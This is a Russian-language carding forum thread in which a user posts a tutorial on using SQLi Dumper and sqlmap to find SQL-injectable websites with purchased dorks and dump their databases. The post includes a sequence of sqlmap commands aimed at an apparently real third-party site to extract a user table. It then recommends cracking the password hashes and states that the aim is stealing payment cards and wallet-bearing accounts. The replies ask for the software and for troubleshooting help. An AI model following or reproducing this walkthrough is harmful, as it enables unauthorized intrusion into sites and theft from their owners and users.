1. По причине блокировки роскомнадзором раз в несколько месяцев мы меняем доменное имя. Чтоб не потерять новую ссылку просто зарегистрируйтесь и вы получите сообщение о замене на свою почту!
    Скрыть объявление
Скрыть объявление
По причине блокировки роскомнадзором раз в несколько месяцев мы меняем доменное имя. Чтоб не потерять новую ссылку просто зарегистрируйтесь и вы получите сообщение о замене на свою почту!
Скрыть объявление
Проводите сделки через Гарант-сервис чтоб полностью обезопасить свои покупки.

SQLi Dumper & SQL Map

Тема в разделе "Библиотека кардера", создана пользователем SergSteroid, 4 мар 2015.

1. SergSteroid

SergSteroid

Симпатии:
    0
    Баллы:
    6
    Приветствую, расскажу о SQLi Dumper и SQL Map.
    Те, кто внимательно читал мою статью про Havij догадываются о чем будет идти речь. Если нет, то это два хороших инструмента кардера и хакера.
    Вот так выглядит
    SQLi Dumper
    Тут мы видим наши дорки, которые вы купили или откопали где-то на шару
    Для начала сканирования нажимаем в верхнем правом углу
    Start Scanner и начинается поиск сайтов, это должно работать нормально если вы все правильно вставили. Там есть вкладка, которая называется Exploitable куда нам нужно войти после того как закончили сканирование и выбираем там Start Exploiter в правом верхнем углу. После того как закончили с эсплойтером идем во вкладку Injectable и нажимаем Start Analyzer в верхнем правом углу, после того как проанализировали клацаем правой кнопкой мыши по ссылке и выбираем Go To Dumper.
    Затем произойдет магия сама по себе... :)
    Нажимаем на базе данных и нажимаем
    Get Tables
    Прогрузились наши таблицы, у меня выпало 31, выбираем нужную нам и нажимаем Get Colums
    Случится другой фокус и программа дала нам 34 колонки, теперь чтобы получить и сохранить необходимую нам информацию на наш кампутер, выбираем нужную нам колонку и выбираем Dump Data
    Круто?

Идем дальше, успеваете?
    SQL Map
    Идем в командную строку и в раздел
    SQL Map
    Вводим эту команду
    sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs
    Проявите немного терпения пока процесс закончится
    Теперь, чтобы получить таблицы для той базы данных вводим эту команду
    sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 --tables
    Должны отобразиться таблицы, выбираем ту, которая нас интересует и колонки которой мы хотим получить и вводим эту команду
    sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 -T tblusers --columns
    Должны появиться колонки. Теперь чтобы сдампить(получить/извлечь) нужную нам инфу с колонок пишем эту комманду
    sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 -T tblusers --dump
    Вот эта инфа, это криптопароль, я думаю sha1 и советую заюзать HashKiller для декрипта
    Для поиска админки
    python скрипт:
    ССЫЛКА

Затем нажимаем Enter и должен пойти поиск специфической директории
    Все, пошел процес сканирования

Выглядит все сложно и сыро, понимаю :)
    Но стоит немножечко посидеть и вникнуть в это все, так сразу все написанное выше покажется вам легким и понятным. Так же не забывайте, что при правильном подборе дорков можно добывать картон, аккаунты к разным сайтам в которых есть внутренние кошельки и траааааааатить их :)
    Всем удачи и экспериментов :)

Специально для ссс.mn
  2. Gluck

Gluck

Симпатии:
    0
    Баллы:
    6
    залейте софт
  3. Smit25

Smit25

Симпатии:
    0
    Баллы:
    6
    ещё и софт подавай))))и так всё подано на блюдечке)))))
  4. shantik

shantik

Симпатии:
    0
    Баллы:
    1
    тема сыра особенно про дампер...не ,так то ТС правильно всё рассказал,но многое не учёл в том числе и настройки,что не мало важно для нормального парсинга и слива БД с сайта!!!!Про криптопароль типа он sha-1 я лучше промолчу в голос,это не sha-1!!!!Данная тема актуальной будет всегда,тек кто парит в написании дорок как я допустим,неплохо пользуются данными инструментами)))
  5. obamaboy

obamaboy

Симпатии:
    0
    Баллы:
    1
    хорошая статья, автору респект!
  6. civatateo

civatateo

Симпатии:
    0
    Баллы:
    1
    Благодарю за статью,многим будет интересно,но информации которой я не могу найти так это про вкладку Tools & Settings ,что там можно настроить как сделать лучше ?Буду рад услышать любые советы,спасибо!
  7. proffi

proffi

Симпатии:
    1
    Баллы:
    3
    Хороший мануал спасиб! У меня проблема дампер не ищет не одного сайта сканит и не находит винда 10 в чём может быть проблема кто знает?
  8. proffi

proffi

Симпатии:
    1
    Баллы:
    3
    SQLi Dumper на 10 винде не работает ? у меня не ищет нечего!

Поделиться этой страницей